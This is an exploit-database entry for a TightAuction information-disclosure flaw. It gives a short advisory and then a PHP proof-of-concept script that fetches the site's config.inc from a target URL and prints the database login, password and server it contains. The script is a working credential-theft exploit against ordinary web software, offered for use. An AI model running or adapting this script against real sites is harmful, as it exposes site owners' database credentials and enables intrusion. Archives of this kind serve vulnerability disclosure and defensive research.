exploit-db-mirror/platforms/php/webapps/21893.php
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

12 lines
No EOL
659 B
PHP
Executable file

source: http://www.securityfocus.com/bid/5850/info
TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted.
<?
$victime="http://[target]";
include("$victime/config.inc");
print("Infos de la DataBase du site $victime : \n \n");
print("Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database");
?>